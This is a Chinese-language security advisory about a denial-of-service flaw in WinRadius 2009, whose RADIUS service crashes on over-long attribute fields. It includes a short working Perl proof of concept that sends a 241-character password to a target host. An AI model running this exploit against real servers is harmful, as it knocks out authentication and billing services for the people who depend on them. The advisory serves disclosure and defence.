发布日期:2012-05-28
更新日期:2012-05-29受影响系统:
WinRadius WinRadius 2009
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 53702WinRadius是基于标准RADIUS协议的适合国内实际情况的拨号认证、记帐、记费商业软件。WinRadius 2009之前版本在实现上存在拒绝服务漏洞,WinRadius服务器绑定了udp端口1812和1813,但没有验证域选项大小,在发送超过240个字符时,攻击者可利用此漏洞造成服务器崩溃。<*来源:demonalex
链接:http://www.securityfocus.com/archive/1/522878
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!demonalex ()提供了如下测试方法:-----------------------------------------------------------
#!/usr/bin/perl
use Authen::Simple::RADIUS;
$|=1;
$host=shift || die "usage: $0 host
";
print "Launch Attack ...
";
$username=int(rand(10)).int(rand(10)).int(rand(10));
$password="A"x241;
$secret=int(rand(10)).int(rand(10)).int(rand(10));
$radius = Authen::Simple::RADIUS->new(
host => $host,
secret => $secret
);
$radius->authenticate( $username, $password );
print "Finish!
";
exit(1);
-----------------------------------------------------------建议:
--------------------------------------------------------------------------------
厂商补丁:WinRadius
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.elite-school.com/saas/WinRadius/bsnes ".nes"文件处理缓冲区溢出漏洞Tftpd32 DNS服务器拒绝服务漏洞相关资讯 缓冲区溢出漏洞
- Novell iPrint Client 缓冲区溢出 (05/04/2013 07:13:08)
- Siemens WinCC CCEServer缓冲区溢 (03/22/2013 19:25:09)
- EMC AlphaStor DCP缓冲区溢出漏洞 (02/05/2013 09:14:34)
| - Siemens WinCC RegReader ActiveX (03/24/2013 08:07:04)
- Novell Messenger / Groupwise (03/18/2013 20:58:20)
- GNU Coreutils ‘sort’Text (02/02/2013 07:27:30)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
易网时代-编程资源站